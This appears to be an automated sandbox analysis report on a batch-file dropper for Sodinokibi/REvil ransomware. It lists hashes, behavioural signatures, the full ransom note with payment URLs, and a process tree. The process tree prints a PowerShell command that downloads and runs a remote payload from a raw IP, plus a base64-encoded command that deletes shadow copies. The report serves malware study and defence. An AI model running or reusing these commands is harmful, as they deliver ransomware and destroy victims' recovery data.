Analysis

  • max time kernel
    138s
  • max time network
    35s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    15-05-2020 19:19

General

  • Target

    1f7cfad9c19adfc78abd3241e8f95952.bat

  • Size

    221B

  • MD5

    a53b25ea0b566a9f0420007a3d2244af

  • SHA1

    eea1e4d5fa16beec4e8cc02e0310345271825017

  • SHA256

    91ab18506b352621e098b6e9f0466b7d7b89cd8c70219f71e31d1c689889433b

  • SHA512

    1afaad2d92aeee642b9a0802f772b18682942d48fd12eb3f1bf8a30afb3d34a6cf29f05b31c6ea4b12f1d9a1c30e3687ff5eb03b6abb58da8cf0d93d1c106b9e

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/1f7cfad9c19adfc78abd3241e8f95952

Extracted

Path

C:\xf62y6e8oc-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension xf62y6e8oc. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/84386979D1DC97D2 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/84386979D1DC97D2 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: v1ILPPhXIJ3YuvMMr6F0dpK7Ikrd6EC+n/4ZvMuyDI8TcvdjaPpQo+9u5xHOMkBe k2Z06vLGEAB/n5jMboggOWwi8OH9T9ZcRb73ogM+WESBkPE6pUdeK+8Lcl1qpTsM SSWwpAB2Yi5adRVcivRqEVWr2KmuYZkYkLqCM470pp6ZP5kYEwgiz4NgbV8Y9LSu pbckIzqBuWmXgmdH5XA2Kw7ABG2K1M6kBL6sBulLrqyX9jrCa4YeVD5NI7IW12Lb jY09aBQvWX40stc6iF5CrrPLND90CokSfD91tUOA6r+U/gWBPqHBKPPqNwiRru3B 68jD6if+qwzL2EHU5Xoh8iYYVxqvGMLU3fcBlsyMSoRNg1Wj68RKB344RbccVCvu zMuqugiuq7gLbiK372SfLmJY3cjzIEIfQw+pnGGpl/pzJAVMsHIC8zB3fKRyGE5H cYpbrCim8Sp5VcZ45uLmXxIVgWMuiLZejse+JOh/Dd8uKfsQcO+VkMCu1n0UOxYf lre9q0sj/ry2Bv6wjpMhTLMNWxZNgb3LQ2t10tT77XCnbqK4677HK8tvkwfgbUyj Q/EImwtIVgUhqLOT27GDBPvrvhhtK2cLo244H4wlzkeT22Xd0xL7GSakD3F6FzT/ 5JS6PiVJ4fTF6BcLfWgAqXEYpzI0JJSr62dQUe1M/eExIm2s+DRluGSoOcvdqhvh qLQLSh74n6j3Il+72ansvDW4SitpSDHops0HWJGJ1Potpj8sPrbI29d7zT9tUo3L h0KFBOOM6SGSIZQS4Nf4YiLoIQVPfbEEACxDVkd8c2B7RHmO0KfPKYvYEw5qsbIz BfRYA8HSRbQgN6F0GJMJh1OoWIizpKEyLvzK3P0ZJnnzsjPv/xtO8f1lPtSMvAoN KWJ1U036QA39Gz2m3hKLWQRvxAeqgtfIpj5j6x8aTGhOTTC0IxLuUiH/TWoATVq2 FI+Y968jq29zpx/qMj4ZfkS9FDKmy3npl7VUb4JgKTnr4/5QeWeXqieYm2f8WcBl fzkPygZnJrZfSLqkx2wumhRy9e9jYA1a1uoNYCPLc8GY8xACcGfhm/EfYFjVtjFE SOzikfTqbCOaLh2wNf/DmmIH+KSV3iKvVLlzMgDRY/SomRRPEsDHT9DJ6/vnlKmG eSJ7wWvlL8l46RCy7bRABYD6GcGBD6oqnxhr8M+hkRF8nrv8IwDzvZK2xwsgiSKc ZRU509M78U7nZTkL9JKvbCEshS2rQLzllHSzYMzQTjwCaG65OagVXX7JZMzQAaOX W2wUKVDqhqOVccR9b8MAq1m+H0pgbDcOJaTh56oz6i9t+bcBzXUCPw== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/84386979D1DC97D2

http://decryptor.cc/84386979D1DC97D2

Signatures

  • Blacklisted process makes network request 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Modifies service 2 TTPs 4 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 77 IoCs
  • Drops file in Program Files directory 36 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Enumerates connected drives 3 TTPs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\1f7cfad9c19adfc78abd3241e8f95952.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:240
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/1f7cfad9c19adfc78abd3241e8f95952');Invoke-QYITNGKHOZRLOK;Start-Sleep -s 10000"
      2⤵
      • Blacklisted process makes network request
      • Sets desktop wallpaper using registry
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Drops file in Program Files directory
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      PID:1600
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:1216
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:1584

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f8f6cc7-ae83-4f79-b06e-2b9a49e06c5b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f934678-4276-4d7d-9a2b-7ccacecf398b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_670419ca-9b90-4e9d-a6c5-f73b7563d382

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9065e065-05e7-4eaa-bb93-1db6da178e99

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3b7b651-7089-41b5-9155-3fb877609508

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7a807a3-f6b6-4397-972a-e9e81988f869

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms